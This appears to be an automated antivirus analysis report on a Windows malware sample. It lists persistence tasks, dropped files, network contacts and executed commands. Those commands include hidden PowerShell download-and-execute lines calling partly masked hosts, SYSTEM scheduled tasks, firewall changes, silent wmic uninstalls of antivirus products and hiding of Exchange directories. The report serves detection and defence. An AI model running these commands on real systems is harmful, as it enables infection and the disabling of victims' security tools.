Technical Information
To ensure autorun and distribution
Creates or modifies the following files
- <SYSTEM32>\tasks\blackball
- <SYSTEM32>\tasks\jztcirgyec9
- <SYSTEM32>\tasks\okfl4sjf\zgly5q3al
- <SYSTEM32>\tasks\microsoft\windows\ecvmry9wsp\vmn3yeq
- <SYSTEM32>\tasks\t.netcatkit.com
- <SYSTEM32>\tasks\zubkce
Malicious functions
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\igp0ju7eh.exe' -
Executes the following
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 65529 SDNSd
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block
Downloads
- http://+t.###+catkit.com/a.jsp?ma################################# as %username%
- http://+d###.#sqlnetcat.com/a.jsp?ma################################# as %username%
- http://+t.###+netcat.com/a.jsp?ma################################# as %username%
- http://+t.###+catkit.com/a.jsp?re################################ as %username%
Modifies file system
Creates the following files
- %WINDIR%\temp\if.bin
- %WINDIR%\temp\m6.bin
- %WINDIR%\temp\kr.bin
- %WINDIR%\temp\m6.bin.ori
- %WINDIR%\temp\779csi77.0.cs
- %WINDIR%\temp\779csi77.cmdline
- %WINDIR%\temp\779csi77.out
Network activity
Connects to
- 't.###catkit.com':80
- 'localhost':43669
- 'do##.#qlnetcat.com':80
- 't.###netcat.com':80
UDP
- DNS ASK microsoft.com
- DNS ASK t.###catkit.com
- DNS ASK do##.#qlnetcat.com
- DNS ASK t.###netcat.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -c I`ex ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://'+##.##t'+'catkit.com/a.jsp?ma########################################################...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -c I`ex ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://'+#####.'+'sqlnetcat.com/a.jsp?ma#####################################################...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -c I`ex ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://'+##.##l'+'netcat.com/a.jsp?ma########################################################...' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%WINDIR%\TEMP\779csi77.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%WINDIR%\TEMP\71pomss7.cmdline"' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c (New-Object Net.WebClient).DownloadString('http://'+##.##t'+'catkit.com/a.jsp?re############################################################## Win32_ComputerSystemProduct).UUID,(random))-joi...' (with hidden window)
Executes the following
- '<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
- '<SYSTEM32>\schtasks.exe' /run /tn \JztciRGyEC9
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn OkfL4sJF\zgLY5q3al /F /tr "powershell -w hidden -c PS_CMD"
- '<SYSTEM32>\schtasks.exe' /run /tn OkfL4sJF\zgLY5q3al
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\ECVMRY9Wsp\Vmn3yEq /F /tr "powershell -w hidden -c PS_CMD"
- '<SYSTEM32>\schtasks.exe' /run /tn MicroSoft\Windows\ECVMRY9Wsp\Vmn3yEq
- '<SYSTEM32>\cmd.exe' /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='e47495da1b30bda0e42089ca6fc07b62';$ifp=$env:tmp+'\if.bin';$down_url='http://do##.##...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='e47495da1b30bda0e42089ca6fc07b62';$ifp=$env:tmp+'\if.bin';$down_url='http://...
- '<SYSTEM32>\cmd.exe' /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='4001ba98a424fdb63047a23af97ec590';$ifp=$env:tmp+'\m6.bin';$down_url='http://do##...
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \JztciRGyEC9 /F /tr "powershell -w hidden -c PS_CMD"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -c PS_CMD
- '<SYSTEM32>\cmd.exe' /S /D /c" echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='4001ba98a424fdb63047a23af97ec590';$ifp=$env:tmp+'\m6.bin';$down_url='http...
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn t.netcatkit.com /F /tr t.netcatkit.com
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \ZUBkce /F /tr "powershell -c PS_CMD"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%WINDIR%\TEMP\779csi77.cmdline"
- '<SYSTEM32>\cmd.exe' /c netsh.exe firewall add portopening tcp 65529 SDNSd
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%WINDIR%\TEMP\71pomss7.cmdline"
- '<SYSTEM32>\schtasks.exe' /run /tn \ZUBkce
- '<SYSTEM32>\netsh.exe' interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
- '<SYSTEM32>\schtasks.exe' /delete /tn Rtsa2 /F
- '<SYSTEM32>\cmd.exe' /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='3c4c0e75810c0fdae2b0162b42fe04a0';$ifp=$env:tmp+'\kr.bin';$down_url='http://do##.##...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='3c4c0e75810c0fdae2b0162b42fe04a0';$ifp=$env:tmp+'\kr.bin';$down_url='http://...
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
- '<SYSTEM32>\attrib.exe' +a +s +r +h "%ProgramFiles%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\js\demo\*"
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +r +h "%ProgramFiles%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\js\demo\*"
- '<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
- '<SYSTEM32>\wbem\wmic.exe' product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
- '<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
- '<SYSTEM32>\wbem\wmic.exe' product where "name like '%avast%'" call uninstall /nointeractive
- '<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
- '<SYSTEM32>\wbem\wmic.exe' product where "name like '%avp%'" call uninstall /nointeractive
- '<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
- '<SYSTEM32>\wbem\wmic.exe' product where "name like '%Security%'" call uninstall /nointeractive
- '<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
- '<SYSTEM32>\wbem\wmic.exe' product where "name like '%Eset%'" call uninstall /nointeractive
- '<SYSTEM32>\wbem\wmic.exe' product where "name like '%AntiVirus%'" call uninstall /nointeractive
- '<SYSTEM32>\wbem\wmic.exe' product where "name like '%Norton Security%'" call uninstall /nointeractive
- '<SYSTEM32>\cmd.exe' /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart
- '<SYSTEM32>\cmd.exe' /c md "%ProgramFiles%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\js\demo"
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +r +h "%ProgramFiles%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\js"
- '<SYSTEM32>\attrib.exe' +a +s +r +h "%ProgramFiles%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\js"
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +r +h "%ProgramFiles%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\js\*"
- '<SYSTEM32>\attrib.exe' +a +s +r +h "%ProgramFiles%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\js\*"
- '<SYSTEM32>\cmd.exe' /c attrib +a +s +r +h "%ProgramFiles%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\js\demo"
- '<SYSTEM32>\attrib.exe' +a +s +r +h "%ProgramFiles%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\js\demo"
- '<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
- '<SYSTEM32>\schtasks.exe' /delete /tn Rtsa1 /F
- '<SYSTEM32>\schtasks.exe' /delete /tn Rtsa /F
